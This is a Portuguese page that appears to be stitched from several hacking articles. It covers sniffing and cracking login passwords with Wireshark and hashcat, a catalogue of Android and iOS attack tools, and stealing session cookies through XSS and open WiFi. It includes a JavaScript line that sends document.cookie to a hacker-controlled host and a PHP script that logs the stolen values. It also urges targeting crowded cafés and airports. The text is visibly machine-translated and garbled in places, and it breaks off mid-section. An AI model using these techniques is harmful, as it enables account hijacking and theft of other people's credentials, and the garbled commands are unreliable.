lar - Para iniciantes
Programas para roubar cookies por IP. Maneiras de roubar biscoitos

Muitos usuários não percebem que ao preencher login e senha ao se cadastrar ou autorizar em um recurso fechado da Internet e pressionar ENTER, esses dados podem ser facilmente interceptados. Muitas vezes eles são transmitidos pela rede de forma insegura. Portanto, se o site no qual você está tentando fazer login usa o protocolo HTTP, é muito fácil capturar esse tráfego e analisá-lo com usando Wireshark e então, usando filtros e programas especiais, encontre e descriptografe a senha.

O melhor local para interceptar senhas é o núcleo da rede, onde o tráfego de todos os usuários vai para recursos fechados (por exemplo, correio) ou na frente do roteador para acesso à Internet, ao se cadastrar em recursos externos. Montamos um espelho e estamos prontos para nos sentirmos como um hacker.

Passo 1. Instale e inicie o Wireshark para capturar tráfego

Às vezes, para isso, basta selecionar apenas a interface através da qual pretendemos capturar o tráfego e clicar no botão Iniciar. No nosso caso, estamos capturando através de uma rede sem fio.

A captura de tráfego começou.

Etapa 2. Filtrando o tráfego POST capturado

Abrimos o navegador e tentamos fazer login em algum recurso usando nome de usuário e senha. Assim que o processo de autorização for concluído e o site aberto, paramos de capturar tráfego no Wireshark. Em seguida, abra o analisador de protocolo e veja um grande número de pacotes. É aqui que a maioria dos profissionais de TI desiste porque não sabe o que fazer a seguir. Mas sabemos e estamos interessados ​​em pacotes específicos que contenham Dados de postagem, que são gerados em nossa máquina local ao preencher um formulário na tela e enviados para servidor remoto quando você clica no botão “Login” ou “Autorização” no navegador.

Entramos em um filtro especial na janela para exibir os pacotes capturados: http.solicitar.método == “PUBLICAR"

E vemos, em vez de milhares de pacotes, apenas um com os dados que procuramos.

Passo 3. Encontre o login e senha do usuário

Clique rapidamente com o botão direito e selecione o item no menu Siga TCP Steam


Depois disso, o texto aparecerá em uma nova janela que restaura o conteúdo da página em código. Vamos encontrar os campos “senha” e “usuário”, que correspondem à senha e nome de usuário. Em alguns casos, ambos os campos serão facilmente legíveis e nem mesmo criptografados, mas se tentarmos capturar tráfego ao acessar recursos muito conhecidos como Mail.ru, Facebook, VKontakte, etc., a senha será criptografada:

HTTP/1.1 302 encontrado

Servidor: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

P3P: CP="NOI ADM DEV PSAI COM NAV NOSSO OTRo STP IND DEM"

Set-Cookie: senha= ; expira = qui, 07 de novembro de 2024 23:52:21 GMT; caminho=/

Localização: logado.php

Comprimento do conteúdo: 0

Conexão: fechar

Tipo de conteúdo: texto/html; conjunto de caracteres=UTF-8

Assim, no nosso caso:

Nome de usuário: networkguru

Senha:

Etapa 4. Determine o tipo de codificação para descriptografar a senha

Por exemplo, acesse o site http://www.onlinehashcrack.com/hash-identification.php#res e digite nossa senha na janela de identificação. Recebi uma lista de protocolos de codificação em ordem de prioridade:

Etapa 5. Descriptografando a senha do usuário

Sobre nesta fase podemos usar o utilitário hashcat:

~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

Na saída recebemos uma senha descriptografada: simplepassword

Assim, com a ajuda do Wireshark, podemos não só resolver problemas no funcionamento de aplicações e serviços, mas também nos testar como hackers, interceptando senhas que os usuários inserem em formulários web. Você também pode descobrir senhas para caixas de correio de usuários usando filtros simples para exibir:

  • O protocolo POP e o filtro são assim: pop.request.command == "USER" || pop.request.command == "PASS"
  • O protocolo e filtro IMAP serão: imap.request contém "login"
  • Protocolo SMTP e você precisará inserir o seguinte filtro: smtp.req.command == "AUTH"

e utilitários mais sérios para descriptografar o protocolo de codificação.

Etapa 6: e se o tráfego for criptografado e usar HTTPS?

Existem várias opções para responder a esta pergunta.

Opção 1. Conectar quando a conexão entre o usuário e o servidor for interrompida e capturar o tráfego no momento em que a conexão for estabelecida (SSL Handshake). Quando uma conexão é estabelecida, a chave da sessão pode ser interceptada.

Opção 2: você pode descriptografar o tráfego HTTPS usando o arquivo de log da chave de sessão registrado pelo Firefox ou Chrome. Para fazer isso, o navegador deve estar configurado para gravar essas chaves de criptografia em um arquivo de log (exemplo baseado no Firefox) e você deverá receber esse arquivo de log. Essencialmente, você precisa roubar o arquivo da chave da sessão disco rígido outro usuário (o que é ilegal). Bem, então capture o tráfego e use a chave resultante para descriptografá-lo.

Esclarecimento. Estamos falando do navegador de uma pessoa cuja senha ela está tentando roubar. Se quisermos descriptografar nosso próprio tráfego HTTPS e quisermos praticar, essa estratégia funcionará. Se você estiver tentando descriptografar o tráfego HTTPS de outros usuários sem acesso aos seus computadores, isso não funcionará - isso é criptografia e privacidade.

Após receber as chaves conforme opção 1 ou 2, é necessário cadastrá-las no WireShark:

  1. Vá para o menu Editar - Preferências - Protocolos - SSL.
  2. Defina o sinalizador “Remontar registros SSL abrangendo vários segmentos TCP”.
  3. “Lista de chaves RSA” e clique em Editar.
  4. Insira os dados em todos os campos e escreva o caminho no arquivo com a chave

“Um smartphone com ferramentas de hacking? Não existe tal coisa”, teríamos dito a vocês recentemente. Foi possível lançar algumas das ferramentas habituais para implementar ataques apenas em alguns Maemo. Agora, muitas ferramentas familiares foram portadas para iOS e Android, e algumas ferramentas de hack foram escritas especialmente para o ambiente móvel. Um smartphone pode substituir um laptop em testes de penetração? Decidimos dar uma olhada.

ANDRÓIDE

O Android é uma plataforma popular não apenas para meros mortais, mas também para as pessoas certas. O número de ][-utilitários úteis aqui é simplesmente extraordinário. Por isso podemos agradecer às raízes UNIX do sistema - isso simplificou bastante a portabilidade de muitas ferramentas para Android. Infelizmente, o Google não permite alguns deles na Play Store, então você terá que instalar o APK correspondente manualmente. Além disso, alguns utilitários exigem acesso máximo ao sistema (por exemplo, o firewall iptables), portanto, você deve cuidar do acesso root com antecedência. Cada fabricante usa sua própria tecnologia aqui, mas encontrar as instruções necessárias é bastante fácil. Um bom conjunto de HOWTOs foi elaborado pelo recurso LifeHacker (bit.ly/eWgDlu). Porém, se você não conseguiu encontrar um modelo aqui, o fórum XDA-Developers (www.xda-developers.com) sempre vem em seu socorro, onde você pode encontrar diversas informações sobre praticamente qualquer modelo de telefone Android. De uma forma ou de outra, alguns dos utilitários descritos abaixo funcionarão sem acesso root.

Gerenciador de pacotes

BotBrew Vamos começar a revisão com um gerenciador de pacotes incomum. Os desenvolvedores chamam isso de “utilitários para superusuários” e isso não está longe da verdade. Depois de instalar o BotBrew, você obtém um repositório de onde pode baixar um grande número de ferramentas familiares compiladas para Android. Entre eles: interpretadores Python e Ruby para executar inúmeras ferramentas escritas neles, um sniffer tcpdump e um scanner Nmap para análise de rede, Git e Subversion para trabalhar com sistemas de controle de versão e muito mais.

Scanners de rede

SEMENTES Um smartphone discreto, que, ao contrário de um laptop, cabe facilmente no bolso e nunca levanta suspeitas, pode ser útil para explorar a rede. Já dissemos acima como você pode instalar o Nmap, mas existe outra opção. PIPS é uma versão do scanner Nmap adaptada especificamente para Android, embora não oficial. Isso significa que você pode encontrar rapidamente dispositivos ativos na rede, determinar seu sistema operacional usando opções de impressão digital, realizar uma varredura de porta - em suma, fazer tudo o que o Nmap é capaz. Fing Existem dois problemas no uso do Nmap, apesar de todo o seu poder. Em primeiro lugar, os parâmetros de digitalização são transmitidos através de teclas de lançamento, que você não só deve conhecer, mas também poder inserir com inconvenientes teclado móvel. E em segundo lugar, os resultados da verificação na saída do console não são tão claros quanto gostaríamos. O scanner Fing não tem essas deficiências; ele verifica a rede muito rapidamente, faz impressões digitais e exibe de forma clara uma lista de todos os dispositivos disponíveis, dividindo-os por tipo (roteador, desktop, iPhone e assim por diante). Ao mesmo tempo, para cada host você pode visualizar rapidamente uma lista de portas abertas. Além disso, a partir daqui você pode conectar-se, digamos, ao FTP, usando o cliente FTP instalado no sistema - muito conveniente. Auditoria Net Quando se trata de analisar um host específico, o utilitário NetAudit pode ser indispensável. Ele funciona em qualquer dispositivo Android (mesmo sem root) e permite não apenas identificar rapidamente dispositivos na rede, mas também examiná-los usando um grande banco de dados de impressões digitais para identificar sistema operacional, bem como sistemas CMS usados ​​no servidor web. Existem agora mais de 3.000 impressões digitais no banco de dados. Ferramentas de rede Se, pelo contrário, você precisa trabalhar em um nível inferior e examinar cuidadosamente o funcionamento da rede, então não pode prescindir do Net Tools. É indispensável no trabalho administrador do sistema um conjunto de utilitários que permite diagnosticar completamente o funcionamento da rede à qual o dispositivo está conectado. O pacote contém mais de 15 tipos diferentes de programas, como ping, traceroute, arp, dns, netstat, route.

Manipulação de tráfego

Tubarão para Raiz O sniffer baseado em tcpdump registra honestamente todos os dados em um arquivo pcap, que pode então ser estudado usando utilitários familiares como Wireshark ou Network Miner. Como não são implementados recursos para ataques MITM, é antes uma ferramenta para analisar seu tráfego. Por exemplo, esta é uma ótima maneira de estudar quais programas instalados em seu dispositivo a partir de repositórios duvidosos transmitem. FaceNiff Se falamos de aplicativos de combate para Android, então um dos mais sensacionais é o FaceNiff, que implementa interceptação e injeção em sessões web interceptadas. Ao baixar o pacote APK com o programa, você pode executar esta ferramenta de hack em quase qualquer smartphone Android e, conectando-se a uma rede sem fio, interceptar contas de uma variedade de serviços: Facebook, Twitter, VKontakte e assim por diante - mais de dez no total. O sequestro de sessão é realizado usando o ataque de falsificação de ARP, mas o ataque só é possível em conexões desprotegidas (o FaceNiff não é capaz de se infiltrar no tráfego SSL). Para conter o fluxo de scriptdis, o autor limitou o número máximo de sessões a três - então você precisa entrar em contato com o desenvolvedor para obter um código de ativação especial. DroidSheep Se o criador do FaceNiff quiser dinheiro para usá-lo, então o DroidSheep é uma ferramenta totalmente gratuita com a mesma funcionalidade. É verdade que você não encontrará o kit de distribuição no site oficial (isso se deve às duras leis da Alemanha em relação aos utilitários de segurança), mas ele pode ser encontrado na Internet sem problemas. A principal tarefa do utilitário é interceptar sessões de usuários da web populares redes sociais, implementado usando o mesmo ARP Spoofing. Mas com conexões seguras problema: como o FaceNiff, o DroidSheep se recusa terminantemente a trabalhar com o protocolo HTTPS. Spoofer de rede Este utilitário também demonstra a insegurança das redes sem fio abertas, mas em um nível ligeiramente diferente. Ele não intercepta sessões de usuários, mas permite que o tráfego HTTP passe por si mesmo usando um ataque de falsificação, realizando manipulações específicas com ele. Começando com pegadinhas comuns (substituindo todas as fotos do site por trollfaces, virando todas as imagens ou, digamos, substituindo os resultados do Google) e terminando com ataques de phishing, quando o usuário recebe páginas falsas de serviços populares como facebook.com, linkedin .com, vkontakte.ru e muitos outros. Anti (kit de ferramentas de rede Android da zImperium LTD)
Se você perguntar qual utilitário de hack para Android é o mais poderoso, então o Anti provavelmente não tem concorrentes. Esta é uma verdadeira combinação de hackers. A principal tarefa do programa é verificar o perímetro da rede. A seguir, vários módulos entram na batalha, com a ajuda dos quais todo um arsenal é implementado: espionagem de tráfego, realização de ataques MITM e exploração de vulnerabilidades encontradas. É verdade que também existem desvantagens. A primeira coisa que chama a atenção é que a exploração das vulnerabilidades é realizada apenas a partir do servidor central do programa, que está localizado na Internet, podendo ser esquecidos os alvos que não possuem endereço IP externo.

Túnel de tráfego

Comando total Bem conhecido gerenciador de arquivos agora em smartphones! Assim como na versão desktop, existe um sistema de plugins para conexão a vários diretórios de rede, bem como um modo canônico de dois painéis - especialmente conveniente em tablets. Túnel SSH Ok, mas como você pode garantir a segurança dos seus dados transmitidos por uma rede sem fio aberta? Além da VPN, que o Android suporta imediatamente, você pode criar um túnel SSH. Para isso, existe um maravilhoso utilitário SSH Tunnel, que permite rotear o tráfego de aplicativos selecionados ou de todo o sistema como um todo através de um servidor SSH remoto. ProxyDroid Muitas vezes é necessário enviar tráfego através de um proxy ou SOX e, neste caso, o ProxyDroid ajudará. É simples: você escolhe qual tráfego de aplicativo deseja encapsular e especifica um proxy (HTTP/HTTPS/SOCKS4/SOCKS5 são suportados). Se for necessária autorização, o ProxyDroid também oferece suporte. A propósito, a configuração pode ser vinculada a um específico rede sem fio, tendo feito configurações diferentes para cada um deles.

Rede sem fio

Wifi Analyzer O gerenciador de rede sem fio integrado não é muito informativo. Se você precisar obter rapidamente uma imagem completa dos pontos de acesso próximos, o utilitário Wifi Analyzer é uma excelente escolha. Não só mostrará todos os pontos de acesso próximos, mas também o canal em que operam, seu endereço MAC e, o mais importante, o tipo de criptografia utilizada (tendo visto as cobiçadas letras “WEP”, podemos assumir que o acesso a a rede segura é fornecida). Além disso, o utilitário é ideal se você precisar descobrir onde está fisicamente localizado o ponto de acesso desejado, graças a um indicador visual de intensidade do sinal. WiFiKill Este utilitário, como afirma seu desenvolvedor, pode ser útil quando a rede wireless está lotada com clientes que utilizam todo o canal, e é neste momento que você precisa boa conexão e conexão estável. WiFiKill permite desconectar clientes da Internet de forma seletiva ou com base em um critério específico (por exemplo, é possível zombar de todos os membros do Yabloko). O programa simplesmente executa um ataque de falsificação de ARP e redireciona todos os clientes para si. Este algoritmo é estupidamente implementado com base no iptables. Este é o painel de controle para redes sem fio de fast food :).

Auditoria de aplicativos da web

Construtor de consultas HTTP Manipular solicitações HTTP de um computador é muito fácil, há um grande número de utilitários e plug-ins de navegador para isso. No caso do smartphone tudo é um pouco mais complicado. O HTTP Query Builder o ajudará a enviar uma solicitação HTTP personalizada com os parâmetros necessários, por exemplo, o cookie desejado ou um User-Agent alterado. O resultado da solicitação será exibido em um navegador padrão. Roteador Força Bruta ADS 2 Se o site estiver protegido por senha usando autenticação de acesso básico, você poderá verificar sua confiabilidade usando o utilitário Router Brute Force ADS 2. Inicialmente, o utilitário foi criado para forçar senhas no painel de administração do roteador, mas está claro que pode ser. usado contra qualquer outro recurso com proteção semelhante. O utilitário funciona, mas é claramente rudimentar. Por exemplo, o desenvolvedor não fornece força bruta, mas apenas força bruta usando um dicionário. AnDOSid Certamente você já ouviu falar de um programa tão sensacional para desabilitar servidores web como o Slowloris. O princípio de seu funcionamento é criar e manter o máximo de conexões com um servidor web remoto, evitando assim que novos clientes se conectem a ele. Então, AnDOSid é um análogo do Slowloris direto no seu dispositivo Android! Vou te contar um segredo, duzentas conexões são suficientes para fornecer trabalho instável um em cada quatro sites executa um servidor web Apache. E tudo isso - do seu telefone!

Vários utilitários

Codificar Ao trabalhar com muitas aplicações web e analisar a sua lógica, é bastante comum encontrar dados transmitidos em forma codificada, nomeadamente Base64. Encode irá ajudá-lo a decodificar esses dados e ver exatamente o que está armazenado neles. Talvez, ao substituir aspas, codificá-las novamente em Base64 e substituí-las na URL do site que você está pesquisando, você obterá o cobiçado erro de consulta ao banco de dados. Editor hexadecimal se necessário editor hexadecimal, então também está disponível para Android. Com o HexEditor você pode editar qualquer arquivo, incluindo arquivos de sistema, se elevar os direitos do programa a superusuário. Um excelente substituto para um editor de texto padrão, permitindo encontrar facilmente o trecho de texto desejado e alterá-lo.

Acesso remoto

ConnectBot Tendo acessado para host remoto, você precisa ser capaz de usá-lo. E para isso precisamos de clientes. Vamos começar com o SSH, onde o ConnectBot já é o padrão de fato. Além do mais interface amigável, oferece a capacidade de organizar túneis seguros por meio de conexões SSH. RDP/VNC remoto PocketCloud Um programa útil que permite conectar-se a uma área de trabalho remota por meio de serviços RDP ou VNC. Estou muito feliz que sejam dois clientes em um; não há necessidade de usar ferramentas diferentes para RDP e VNC. Navegador MIB SNMP Especialmente escrito para Navegador Android MIB, com o qual você pode gerenciar dispositivos de rede Protocolo SNMP. Pode ser útil para desenvolver um vetor de ataque em vários roteadores, pois a string de comunidade padrão (em outras palavras, uma senha de acesso) para gerenciamento via SNMP ainda não foi cancelada.

iOS

A plataforma iOS não é menos popular entre os desenvolvedores de utilitários de segurança. Mas se no caso de Direitos do Android Embora o root fosse necessário apenas para alguns aplicativos, o jailbreak quase sempre é necessário em dispositivos Apple. Felizmente, mesmo para o firmware mais recente do iDevices (5.1.1) já existe uma ferramenta de jailbreak. Junto com o acesso total, você também obtém um gerenciador de aplicativos alternativo, o Cydia, que já contém muitos utilitários.

Trabalhando com o sistema

Terminal Móvel A primeira coisa que quero começar é instalar o terminal. Por razões óbvias, ele não está incluído na entrega padrão do sistema operacional móvel, mas precisaremos dele para executar utilitários de console, que discutiremos mais adiante. A melhor implementação de um emulador de terminal é o MobileTerminal - ele suporta vários terminais, gestos de controle (por exemplo, para enviar Control-C) e geralmente impressiona por sua consideração. iSSH Mais um, mais opção difícil obtenha acesso ao console do dispositivo - instale o OpenSSH nele (isso é feito via Cydia) e conecte-se a ele localmente por meio de um cliente SSH. Se você usar o cliente certo como o iSSH, que possui um incrível controle de tela sensível ao toque, esse método será ainda mais conveniente do que usar o MobileTerminal.

Interceptação de dados

Pirni e Pirni Pro Agora que você tem acesso ao console, pode experimentar os utilitários. Vamos começar com Pirni, que entrou para a história como um sniffer completo para iOS. Infelizmente, o módulo Wi-Fi estruturalmente limitado integrado no dispositivo não pode ser alterado para o modo promíscuo necessário para a interceptação normal de dados. Assim, para interceptar dados, utiliza-se o clássico ARP spoofing, com o qual todo o tráfego passa pelo próprio dispositivo. A versão padrão do utilitário é iniciada a partir do console, onde, além dos parâmetros de ataque MITM, é especificado o nome do arquivo PCAP, no qual todo o tráfego é registrado. O utilitário possui uma versão mais avançada - Pirni Pro, que possui uma interface gráfica. Além disso, ele pode analisar o tráfego HTTP em tempo real e até extrair automaticamente dados interessantes de lá (por exemplo, logins e senhas), usando expressões regulares, que são definidos nas configurações. Intercepter-NG (edição de console) O conhecido sniffer Intercepter-NG, sobre o qual já escrevemos várias vezes, teve recentemente uma versão para console. Como diz o autor, a maior parte do código é escrita em ANSI C puro, que se comporta da mesma forma em quase todos os ambientes, então a versão do console funcionou desde o início tanto em desktops Windows, Linux e BSD, quanto em plataformas móveis, incluindo iOS e Android. A versão do console já implementa a captura de senhas transmitidas por diversos protocolos, interceptando mensagens de mensagens instantâneas (ICQ/Jabber e muitos outros), bem como recuperando arquivos do tráfego (HTTP/FTP/IMAP/POP3/SMTP/SMB). Ao mesmo tempo, funções de digitalização de rede e ARP Poison de alta qualidade estão disponíveis. Para um funcionamento correto, você deve primeiro instalar o pacote libpcap via Cydia (não se esqueça de habilitar os pacotes de desenvolvimento nas configurações). Todas as instruções de inicialização se resumem à configuração dos direitos corretos: chmod +x intercepter_ios. A seguir, se você executar o sniffer sem parâmetros, uma interface clara e interativa do Itercepter aparecerá, permitindo lançar qualquer ataque. Ettercap-NG É difícil de acreditar, mas esta ferramenta sofisticada para implementar ataques MITM foi finalmente portada para iOS. Depois de muito trabalho, conseguimos fazer uma porta móvel completa. Para evitar dançar com um pandeiro em torno das dependências durante a autocompilação, é melhor instalar um pacote já compilado usando Cydia, após adicionar theworm.altervista.org/cydia (repositório TWRepo) como fonte de dados. EM incluído e o utilitário etterlog, que ajuda a extrair vários tipos de informações úteis do despejo de tráfego coletado (por exemplo, contas de acesso FTP).

Análise de rede sem fio

Analisador WiFi Antigamente Versões iOS os artesãos executaram o aircrack e conseguiram quebrar a chave WEP, mas verificamos: o programa não funciona em dispositivos novos. Portanto, para estudar o Wi-Fi, teremos que nos contentar apenas com scanners de Wi-Fi. Analisador WiFi Analisa e exibe informações sobre todas as redes 802.11 disponíveis, incluindo informações sobre SSID, canais, fornecedores, endereços MAC e tipos de criptografia. O utilitário constrói gráficos visuais em tempo real com base nos dados presentes no ar. Com esse programa é fácil encontrar a localização física do ponto caso você o esqueça repentinamente e, por exemplo, consultar o PIN WPS, que pode ser útil para conexão.

Scanners de rede

Scany Qual programa qualquer pentester em qualquer lugar do mundo usa, independentemente de metas e objetivos? Scanner de rede. E no caso do iOS, este provavelmente será o kit de ferramentas Scany mais poderoso. Graças a um conjunto de utilitários integrados, você pode obter rapidamente uma imagem detalhada de dispositivos de rede ah e, ​​por exemplo, portas abertas. Além disso, o pacote inclui utilitários de teste de rede como ping, traceroute, nslookup. Fing No entanto, muitas pessoas preferem Fing. O scanner tem funcionalidade bastante simples e limitada, mas é suficiente para o primeiro contato com a rede de, digamos, uma cafeteria :). Os resultados exibem informações sobre serviços disponíveis em máquinas remotas, endereços MAC e nomes de host conectados à rede verificada. Nikto Parece que todo mundo se esqueceu de Nikto, mas por quê? Afinal, você pode instalar facilmente este scanner de vulnerabilidades da web, escrito em uma linguagem de script (ou seja, Perl), via Cydia. Isso significa que você pode iniciá-lo facilmente em seu dispositivo desbloqueado a partir do terminal. Nikto terá prazer em lhe fornecer Informações adicionais no recurso da web testado. Além disso, você pode adicionar suas próprias assinaturas de pesquisa ao banco de dados de conhecimento com suas próprias mãos. sqlmap Isto ferramenta poderosa para exploração automática de vulnerabilidades SQL, ele é escrito em Python, o que significa que depois de instalar o interpretador, você pode usá-lo facilmente diretamente do seu dispositivo móvel.

Controle remoto

Verificação SNMP Muitos dispositivos de rede (incluindo roteadores caros) são gerenciados usando o protocolo SNMP. Este utilitário permite verificar sub-redes em busca de serviços SNMP disponíveis com valores de string de comunidade pré-conhecidos (em outras palavras, senhas padrão). Observe que a busca por serviços SNMP com cadeias de comunidade padrão (pública/privada) na tentativa de obter acesso ao gerenciamento de dispositivos é parte integrante de qualquer teste de penetração, juntamente com a identificação do próprio perímetro e a identificação de serviços. iTap móvel RDP / iTap móvel VNC Dois utilitários do mesmo fabricante foram projetados para conectar-se a uma área de trabalho remota usando os protocolos RDP e VNC. Utilitários semelhantes em Loja de aplicativos Existem muitos, mas estes são os que são especialmente convenientes de usar.

Recuperação de senha

Hidra O lendário programa que ajuda milhões de hackers em todo o mundo a “lembrar” suas senhas foi portado para iOS. Agora você pode pesquisar senhas de serviços como HTTP, FTP, TELNET, SSH, SMB, VNC, SMTP, POP3 e muitos outros diretamente do seu iPhone. É verdade que, para um ataque mais eficaz, é melhor estocar bons dicionários de força bruta. Mula de passagem Todo mundo conhece em primeira mão a vulnerabilidade do uso senhas padrão. Pass Mule é um tipo de diretório que contém todos os tipos de logins e senhas padrão para dispositivos de rede. Eles são convenientemente organizados por nome do fornecedor, produto e modelo, portanto, não será difícil encontrar o que você precisa. O programa foi projetado para economizar tempo na busca pelo manual do roteador, cujo login e senha padrão você precisa descobrir.

Explorando vulnerabilidades

Metasploit
É difícil imaginar um utilitário mais hacker do que o Metasploit, e é isso que conclui nossa análise de hoje. Metasploit é um pacote de diversas ferramentas cuja principal tarefa é explorar vulnerabilidades em Programas. Imagine: cerca de 1000 exploits confiáveis, comprovados e necessários no dia a dia de um pentester - direto no seu smartphone! Com a ajuda dessa ferramenta você pode realmente se estabelecer em qualquer rede. O Metasploit não apenas permite explorar falhas em aplicativos de servidor - também estão disponíveis ferramentas para atacar aplicativos clientes (por exemplo, por meio do módulo Browser Autopwn, quando uma carga útil de combate é inserida no tráfego do cliente). Aqui deve ser dito que versão móvel Não há kit de ferramentas, mas você pode instalar um pacote padrão em um dispositivo Apple usando .

O que é um biscoito?

Existe um mecanismo que permite ao servidor http salvar algumas informações de texto no computador do usuário e depois acessá-las. Essa informação chamado de biscoito. Essencialmente, cada cookie é um par: o nome de um parâmetro e seu valor. A cada cookie também é atribuído o domínio ao qual pertence. Por questões de segurança, em todos os navegadores o servidor http só tem permissão para acessar o cookie do seu domínio. Além disso, os cookies podem ter uma data de validade, caso em que ficarão armazenados no computador até essa data, mesmo que feche todas as janelas do navegador.


Por que os cookies são importantes?

Todos os sistemas multiusuário utilizam cookies para identificar o usuário. Mais precisamente, a conexão atual do usuário com o serviço, sessão do usuário. Se alguém reconhecer seus cookies, poderá fazer login no sistema em seu nome. Porque em atualmente muito poucos recursos da Internet verificam alterações de endereço IP durante uma sessão de usuário.


Como alterar ou substituir cookies?

Os desenvolvedores de navegadores não fornecem ferramentas integradas para edição de cookies. Mas você pode sobreviver com um bloco de notas normal.


Etapa 1: criar arquivo de texto com texto

Editor de registro do Windows versão 5.00



@="C:\\IE_ext.htm"

Salve-o com o nome IE_ext.reg

Passo 2: Usando o arquivo criado, adicione alterações ao registro do Windows.

Etapa 3: crie um arquivo de texto com texto

< script idioma="javascript">
external.menuArguments.clipboardData.setData("Texto", external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; caminho=/; domínio=testdomain.ru";
alerta(external.menuArguments.document.cookie);


Salve-o com o nome C:\IE_ext.htm

Passo 4: Vamos ao site de nosso interesse.

Etapa 5: clique com o botão direito em um espaço vazio da página e selecione o item de menu "Trabalhando com Cookies". Permitir acesso à área de transferência. Seu biscoito disso local na rede Internet. Você pode inserir o bloco de notas e dar uma olhada.


Passo 6: Para alterar alguns cookies, edite o arquivo C:\IE_ext.htm, substituindo nome de teste em nome do biscoito, valor de teste- sobre o seu significado, testdomain.ru– para o domínio do site. Se necessário, adicione mais linhas semelhantes. Para facilitar o controle, adicionei ao script a saída dos cookies atuais antes e depois da alteração: alerta(external.menuArguments.document.cookie);

Etapa 7: execute a Etapa 5 novamente e atualize a página.

Resumindo: acessaremos este recurso da Internet com cookies atualizados.

Como roubar cookies usando JavaScript?

Se um invasor conseguir encontrar uma oportunidade de executar um script JavaScript arbitrário no computador da vítima, ele poderá ler os cookies atuais com muita facilidade. Exemplo:


var str=documento.cookie;

Mas ele conseguirá transferi-los para seu site, porque, como indiquei anteriormente, um script JavaScript não conseguirá acessar um site localizado em um domínio diferente sem confirmação adicional? Acontece que um script JavaScript pode carregar qualquer imagem localizada em qualquer servidor http. Ao mesmo tempo, transfira qualquer informação de texto na solicitação de download para esta imagem. Exemplo: http://hackersite.ru/xss.jpg?text_info Então, se você executar este código:

var img= nova imagem();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(documento.cookie);


então o cookie irá parar na solicitação de download da “imagem” e irá “ir” para o invasor.

Como lidar com essas solicitações de download de uma “imagem”?

Um invasor só precisa encontrar uma hospedagem com suporte a PHP e colocar lá um código como este:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Então todos os parâmetros de solicitação deste script serão salvos no arquivo log.txt. Resta apenas substituir o script JavaScript descrito anteriormente http://hackersite.ru/xss.jpg para o caminho para este script php.


Resultado final

Mostrei apenas a maneira mais simples de explorar vulnerabilidades XSS. Mas isso prova que a presença de pelo menos uma dessas vulnerabilidades em um site multiusuário da Internet pode permitir que um invasor use seus recursos em seu nome.

Olá, este pequeno artigo, bastante uniforme Pequena descrição Eu gostaria de me dedicar maneira simples interceptar cookies em redes wi-fi. Não vou contar aqui o que são cookies e por que são necessários, se uma pessoa tem interesse em interceptar “produtos de panificação”; em uma rede sem fio, acho que ele deveria saber o que é e por que precisa disso. Direi apenas uma coisa: usando esses arquivos você pode obter acesso às contas de outras pessoas em vários sites que exigem que os usuários passem por um processo de autenticação (por exemplo, mail.ru, vkontakte.ru, etc.).

Então vamos começar. Primeiramente precisamos encontrar a própria rede wireless, com gateway de acesso à Internet aberto, e é desejável que esta rede tenha bastante clientes. Por exemplo, qualquer rede em grandes shopping centers, aeroportos, diversas cafeterias é adequada nesses locais que as pessoas costumam usar; acesso wi-fi na Internet, para ler e-mails, verificar contas em vários sites de namoro, visualizar LJ e vários fóruns. Isso é exatamente o que precisamos. Decidida a escolha da localização da rede, tendo estudado determinados horários do número máximo de clientes, passemos diretamente às operações de combate. Para isso precisamos de um laptop com adaptador wi-fi e um determinado conjunto de programas. No meu caso, usei Notebook Acer Aspire 3610, placa wi-fi cliente D-Link DWL G650 e sistema operacional BackTrack3 instalado.

Aconselho que utilize este SO, pois já inclui todo o conjunto de programas que poderá necessitar, e a vantagem mais importante é que não necessita de instalar o Backtrack no seu Disco rígido, você pode inicializar este sistema operacional diretamente de um CD ou unidade flash.

Agora vamos passar para o software necessário. Usei o kismet para descoberta de rede e o WifiZoo para interceptar cookies. Vou me alongar em detalhes no segundo programa. WifiZoo é um scanner passivo de ondas aéreas e coleta bastante informação útil, como: pop3, tráfego smtp, cookies/authinfo http, msn, credenciais ftp, tráfego de rede telnet, nbt, etc. A única desvantagem deste programa é a falta do modo de salto de canal, o WifiZoo apenas escuta interface sem fio, e não pode, por assim dizer, pular de canal para canal. Mas esta desvantagem é compensada por outro programa, o Kismet, que suporta este modo. Para iniciar o WifiZoo você precisará de:

  • Pitão
  • assustador
  • Kismet

Então, vamos iniciar o programa, primeiro vamos iniciar o Kismet para suportar o modo de salto de canal e, em seguida, iniciar o WifiZoo diretamente, a seguinte janela deve aparecer na sua frente:

Agora só falta sentar e esperar até interceptar algo; tudo o que o programa intercepta pode ser encontrado nos logs, que estão localizados no diretório com o programa /logs/. Você também pode iniciar uma interface GUI que se conecta automaticamente ao http em 127.0.0.1:8000

Não vou escrever sobre todos os recursos deste maravilhoso programa, acho que você mesmo descobrirá os outros recursos, já que no momento estamos interessados ​​​​apenas em cookies. Clique no link que diz cookies e veja o que interceptamos:

Maneiras de roubar biscoitos

Este método de hacking, roubo de cookies, funciona muito bem e é usado por muitos hackers. Se você também quer experimentar, mas não sabe o que fazer, leia nossas recomendações.

O que são biscoitos?

Estas são informações sobre a visita de um usuário a um site específico. Ele é armazenado em um local separado documento de texto. Lá você pode encontrar uma variedade de informações. Incluindo logins, senhas, endereços caixas de correio e números de telefone. É por isso que os ladrões se esforçam para colocar as mãos nesses documentos. Para roubar os materiais de que precisam, os hackers recorrem a diversos métodos.

Maneiras de roubar biscoitos

Vulnerabilidade XSS

Ele pode ser encontrado e usado em qualquer site. Quando um especialista encontra uma vulnerabilidade, ele a implementa código especial. Dependendo da finalidade, os códigos são diferentes; são escritos para um recurso específico. Quando um usuário visita esta página e a atualiza, todas as alterações são aplicadas. O código começa a agir - ele fica embutido no computador da vítima e coleta todos informação necessária do navegador.

Para introduzir código, você pode usar qualquer tipo de vulnerabilidade - um erro em um recurso da web, em um navegador ou em um sistema de computador.

Existem 2 tipos de ataques XSS:

Passiva - direcionado ao script da página. Nesse caso, você precisa procurar vulnerabilidades nos elementos da página. Por exemplo, uma aba com diálogos, uma caixa de pesquisa, um catálogo de vídeos, etc.

Ativo - você deve procurá-los no servidor. Eles são especialmente frequentes em diversos fóruns, blogs e chats.

Como forçar uma pessoa a aplicar XSS?
